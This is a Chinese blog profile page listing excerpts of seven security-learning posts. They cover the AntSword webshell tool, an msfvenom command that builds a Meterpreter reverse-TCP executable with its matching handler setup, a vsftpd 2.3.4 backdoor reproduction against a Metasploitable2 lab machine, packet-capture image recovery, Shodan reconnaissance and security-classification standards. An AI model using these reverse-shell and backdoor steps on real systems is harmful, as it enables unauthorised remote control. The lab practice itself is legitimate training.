自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(7)
  • 收藏
  • 关注

原创 中国蚁剑的应用

2.漏洞利用:集成了多种常见的Web漏洞利用模块,如SQL注入、文件上传等,用户可以通过简单的操作进行漏洞利用,以验证系统的安全性。拿到webshell后我们可以对里面各种文件进行增删改阅的操作也可以获得连接机器的各种机器,例如ip地址,mac地址等。1.信息收集:蚁剑能够自动扫描目标网站,识别潜在的漏洞和敏感信息,帮助安全人员了解目标的安全状况。3.远程控制:一旦利用成功,蚁剑可以实现对目标服务器的远程控制,进行进一步的操作和数据提取。

2024-10-27 20:20:07 982

原创 Kali中生成被控端

1.输入:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= ip地址 lport=10010 -f exe -o /home/yu/Desktop/payload.exe。3.我们进行远控实际上只需要用到Meterpreter2的某个模块而已,这个模块就是exploit/mutil/handler。使用这个模块,并且把payload,lhost,lport改成生成远控程序的一模一样。2.输入msfconsole。

2024-10-25 15:38:31 327

原创 笑脸漏洞复现

4.利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入,注意:这里需要手动输入,此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会随之关闭。2.输入nmap 192.168.109.133/24,查看Metasploitable2的ip。1.在kail虚拟机中进入root模式,输入ifconfig查看本机ip。可以看到21端口打开且版本是VSFTPD2.3.4。5.开新的终端用nmap扫描端口6200。6.在连接6200端口。

2024-10-22 21:26:41 172

原创 qq9分析;同一子网传输恢复文件

二.查看自己手机IP地址并在过滤器输入ip.src==IP地址,点击查找。由于图片是jpg格式,所以删除(FF D8)之前的数据并保存可恢复图片。更改下方数据如图所示,并另存为到桌面为.jpg格式。三.在同一子网下用手机QQ给pc端发一个图片。一.打开Wireshark。Wireshark数据改变。五.用Winhex打开图片。

2024-10-12 18:00:02 271

原创 搜索引擎介绍与如何进行子域名收集

由于 Shodan 本身并不是专门用于子域名收集,建议与其他子域名发现工具(如 Sublist3r、Subfinder 等)结合使用,以便更全面地收集子域名信息。在搜索框中,你可以直接输入目标的域名(例如 example.com),Shodan 将显示与该域名相关的 IP 地址和信息,但直接列出子域名的能力有限。例如,输入 hostname:example.com 来查找所有与 example.com 相关联的子域名。1.在首页的搜索框输入目标域名。在搜索框中输入目标域名,结合特定的搜索语法来过滤结果。

2024-10-08 21:10:47 341

原创 四级网络安全事件以及分类标准

处理:需要高层管理人员介入,成立专门的事件响应团队,进行全面的应急响应和恢复流程,同时可能需要向法律机构报告。描述:此类事件会对企业运营造成重大影响,可能涉及大规模的数据泄露、系统全面崩溃或严重的法律责任。描述:此类事件可能导致部分服务中断或轻微的数据泄露,但对业务的整体运营和用户的影响较小。描述:此类事件已经导致严重的业务中断、数据丢失或泄露,并且可能对用户的隐私造成威胁。处理:需要立即采取响应措施,并进行详细的调查和分析,以确定事件的根本原因和影响范围。影响于单一系统:事件仅影响特定的一个或几个系统。

2024-10-01 19:37:38 1938

原创 关于等保2.0的理解

2. 保护等级:等保2.0将信息系统分为五个安全等级,等级越高,要求的安全措施和管理要求越严格。4. 风险评估:等保2.0强调风险评估的重要性,要求在信息系统的建设和运维过程中,定期进行安全风险评估,并针对发现的风险制定相应的安全防护措施。5. 安全管理:对组织的安全管理提出更高的要求,强调安全管理与技术措施的结合,要求制定完善的安全管理制度和操作规程,从而提升整体安全水平。1. 制度背景:等保2.0是在等保1.0的基础上进行的升级,适应了信息技术的发展,特别是云计算、大数据、物联网等新兴技术的应用。

2024-10-01 19:28:54 348

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除